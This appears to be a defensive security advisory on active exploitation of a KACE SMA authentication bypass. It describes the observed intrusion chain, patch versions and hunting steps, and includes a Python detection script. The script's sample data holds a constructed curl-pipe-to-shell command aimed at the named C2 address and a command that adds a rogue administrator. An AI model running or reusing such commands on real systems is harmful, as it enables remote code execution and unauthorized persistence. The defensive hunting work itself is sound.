CVE-2025-32975: Attackers Are Already Inside Unpatched KACE SMA Environments


If you're running Quest KACE Systems Management Appliance and you haven't patched since May 2025, you may already be compromised.

Arctic Wolf researchers detected active exploitation of CVE-2025-32975 — a CVSS 10.0 authentication bypass in KACE SMA's Single Sign-On mechanism — beginning the week of March 9, 2026. The patch has been available for nearly a year. The attackers aren't waiting for you to catch up.

What the Vulnerability Does

CVE-2025-32975 lives in KACE SMA's SSO authentication handling. Exploiting it requires no valid credentials. An attacker can impersonate any legitimate user and walk straight into full administrative control of the appliance.

KACE SMA is an on-premises endpoint management platform. Organizations use it to push software, monitor endpoints, enforce policy, and manage system configuration across their environments. It has native access to everything. That's precisely why it's on the target list.

The Attack Chain Arctic Wolf Is Seeing

This isn't speculative. Researchers observed the full intrusion sequence in compromised customer environments.

Initial access: Attackers bypass SSO authentication and seize administrative accounts. No brute force. No phishing. They just log in.

Command execution: Once in, they use KACE's native `KPluginRunProcess` functionality to run remote commands. Payloads arrive Base64-encoded via curl from a known C2 server: `216.126.225.156`. The encoding is basic evasion — just enough to slip past casual log inspection.

Persistence: The attackers abuse `runkbot.exe`, a legitimate KACE SMA background process used for script execution and package management, to create unauthorized administrative accounts. Rogue users get added to both local and domain administrator groups. Hidden PowerShell scripts — `Enable-UpdateServices.ps1` and `taskband.ps1` — modify registry settings to ensure the backdoor survives reboots and routine maintenance.

Credential harvesting: Mimikatz gets deployed. Arctic Wolf observed it running under the filename `asd.exe` — a low-effort disguise that still evades signature detection on systems without behavioral monitoring. Plaintext credentials come out of memory.

Lateral movement: Equipped with harvested credentials and domain enumeration (via `net time`, `net group`, and user listing commands), the attackers pivot laterally. The destination: domain controllers and enterprise backup servers.

That last detail matters. Researchers observed attackers establishing RDP sessions specifically to Veeam and Veritas backup infrastructure. This is pre-ransomware positioning. Attackers who control your backups control your recovery options.

Scope and Exposure

The vulnerability affects all KACE SMA branches that haven't applied the May 2025 patches. Quest released fixes across every active release line:

  • Branch 13.0 → upgrade to 13.0.385
  • Branch 13.1 → upgrade to 13.1.81
  • Branch 13.2 → upgrade to 13.2.183
  • Branch 14.0 → apply Patch 5 (version 14.0.341)
  • Branch 14.1 → apply Patch 4 (version 14.1.101)

The fact that exploitation is still happening nearly a year after the patch was released tells you how many organizations treat on-premises management appliances: as set-it-and-forget-it infrastructure that doesn't follow the same patching cadence as workstations and servers.

That assumption is catastrophically wrong. Management appliances are high-value targets precisely because they have privileged access to everything else.

What to Do Right Now

If you're running internet-exposed KACE SMA: Take it offline immediately. An authentication bypass with a CVSS 10.0 score and active exploitation means exposure is not a theoretical risk. Remove it from the public internet, restrict access to VPN or firewall-controlled segments, then patch.

Hunt for existing compromise before you patch. Check for:

  • Unauthorized accounts in KACE SMA and Active Directory added since March 9
  • `runkbot.exe` spawning unexpected child processes
  • Curl-based outbound connections to `216.126.225.156` in firewall or proxy logs
  • Base64-encoded command strings in SMA logs
  • Registry modifications from `Enable-UpdateServices.ps1` or `taskband.ps1`
  • `asd.exe` or unexpected Mimikatz artifacts on KACE SMA hosts
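The checklist above can be turned into a repeatable triage script. The following Python is an added example written for this article, not Arctic Wolf's or Quest's code: it runs the indicators quoted above (the C2 address, the two PowerShell script names, the `asd.exe` file name, and `runkbot.exe` spawning children) over three constructed inputs, a proxy log, an SMA log line carrying a Base64-encoded command, and a handful of process-creation records. The log formats, host names, the KACE agent install path and the list of "high-risk" child processes are assumptions you will need to adapt to your own telemetry; the decoded sample payload is constructed to show why the Base64 check matters (the C2 address is only visible after decoding).

```python
import base64
import re

# Indicators taken from the Arctic Wolf findings summarised above
C2_IP = "216.126.225.156"
SUSPECT_SCRIPTS = {"enable-updateservices.ps1", "taskband.ps1"}
SUSPECT_BINARIES = {"asd.exe"}

# Assumption (not from the write-up): runkbot.exe spawning a shell, script host or
# account-management tool is unexpected; any other child is reported for baselining.
HIGH_RISK_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "net.exe", "net1.exe"}

C2_RE = re.compile(r"(?<![\d.])" + re.escape(C2_IP) + r"(?![\d.])")
# Runs of 32+ Base64 characters; shorter runs produce too many false positives
B64_RE = re.compile(r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{32,}={0,2})(?![A-Za-z0-9+/=])")


def decode_b64_fragments(text):
    """Return every Base64 run in `text` that decodes to readable UTF-8 or UTF-16LE."""
    out = []
    for token in B64_RE.findall(text):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                decoded = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
                out.append(decoded)
                break
    return out


def hunt_proxy_logs(lines):
    """Flag outbound connections to the C2 address in firewall/proxy log lines."""
    return [{"line": n, "rule": "c2_contact", "detail": C2_IP}
            for n, line in enumerate(lines, 1) if C2_RE.search(line)]


def hunt_sma_logs(lines):
    """Flag C2 contact, encoded command strings and known artefact names in SMA logs."""
    findings = []
    for n, line in enumerate(lines, 1):
        if C2_RE.search(line):
            findings.append({"line": n, "rule": "c2_contact", "detail": C2_IP})
        for decoded in decode_b64_fragments(line):
            findings.append({"line": n, "rule": "encoded_command", "detail": decoded})
            if C2_RE.search(decoded):  # indicator only becomes visible after decoding
                findings.append({"line": n, "rule": "c2_contact_encoded", "detail": C2_IP})
        low = line.lower()
        for name in SUSPECT_SCRIPTS | SUSPECT_BINARIES:
            if name in low:
                findings.append({"line": n, "rule": "known_artifact", "detail": name})
    return findings


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def hunt_process_events(events):
    """Flag runkbot.exe children, the asd.exe Mimikatz disguise and the persistence
    scripts in process-creation records (dicts: host, parent_image, image, cmdline)."""
    findings = []
    for ev in events:
        parent, image = _basename(ev["parent_image"]), _basename(ev["image"])
        cmdline = ev.get("cmdline", "").lower()
        if image in SUSPECT_BINARIES:
            findings.append({"host": ev["host"], "rule": "known_artifact", "detail": image, "severity": "high"})
        if parent == "runkbot.exe":
            sev = "high" if image in HIGH_RISK_CHILDREN else "review"
            findings.append({"host": ev["host"], "rule": "runkbot_child", "detail": image, "severity": sev})
        for name in SUSPECT_SCRIPTS:
            if name in cmdline:
                findings.append({"host": ev["host"], "rule": "persistence_script", "detail": name, "severity": "high"})
    return findings


# Constructed sample records (not real telemetry); formats, hosts and paths are made up
SAMPLE_PROXY_LOG = [
    "2026-03-10T02:14:07Z src=10.20.0.15 dst=216.126.225.156 dport=80 ua=curl/8.4.0 uri=/stage.sh action=allow",
    "2026-03-10T02:14:09Z src=10.20.0.15 dst=203.0.113.10 dport=443 ua=Mozilla/5.0 uri=/ action=allow",
]
_CONSTRUCTED_PAYLOAD = "curl -s http://216.126.225.156/stage.sh | sh"  # constructed, encoded below
_CONSTRUCTED_B64 = base64.b64encode(_CONSTRUCTED_PAYLOAD.encode()).decode()
SAMPLE_SMA_LOG = [
    f'2026-03-10 02:13:55 KPluginRunProcess user=admin cmd="echo {_CONSTRUCTED_B64} | base64 -d | sh"',
    '2026-03-10 02:20:11 KPluginRunProcess user=admin cmd="/bin/ls /tmp"',
]
KACE_AGENT_DIR = r"C:\Program Files (x86)\Quest\KACE"  # assumption; use your agent's real install path
SAMPLE_PROCESS_EVENTS = [
    {"host": "WS-0417", "parent_image": KACE_AGENT_DIR + r"\runkbot.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c net localgroup administrators svc_helper /add"},
    {"host": "WS-0417", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Temp\asd.exe", "cmdline": "asd.exe"},
    {"host": "WS-0417", "parent_image": KACE_AGENT_DIR + r"\runkbot.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\ProgramData\taskband.ps1"},
    {"host": "WS-0418", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for finding in (hunt_proxy_logs(SAMPLE_PROXY_LOG) + hunt_sma_logs(SAMPLE_SMA_LOG)
                    + hunt_process_events(SAMPLE_PROCESS_EVENTS)):
        print(finding)
```

Run against the constructed data it reports the curl connection in the proxy log, the encoded `KPluginRunProcess` command together with its decoded contents, the `cmd.exe` and `powershell.exe` children of `runkbot.exe`, `asd.exe`, and the `taskband.ps1` invocation. The `review` severity on unrecognised `runkbot.exe` children is deliberate: baseline what the agent normally spawns in your estate before treating every child as hostile, and raise the bar for the shells and account tools the intrusion relied on.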

Audit your backup infrastructure: If attackers got lateral movement to your Veeam or Veritas environment, verify backup integrity now. Don't assume your recovery options are clean.

Rotate credentials: Any account that authenticated through KACE SMA since March 9 should be treated as potentially compromised. That includes service accounts.

The Broader Pattern

This follows a pattern that's become reliable: a critical vulnerability in an on-premises management appliance sits unpatched for months, then gets weaponized right before attackers are ready to operationalize it at scale. KACE SMA joins a list that includes Ivanti, Fortinet, and ConnectWise products that were exploited in the same way — quietly, after defenders stopped paying attention.

The threat actors here showed operational maturity. They used living-off-the-land techniques (runkbot.exe, KPluginRunProcess), minimal fingerprints, and made a beeline for backup infrastructure. The goal isn't just access — it's positioning for an outcome you won't recover from easily.

Patch your KACE SMA. Pull it off the internet. Check your domain controllers and backup servers for unauthorized RDP sessions. The window to get ahead of this is already narrow.
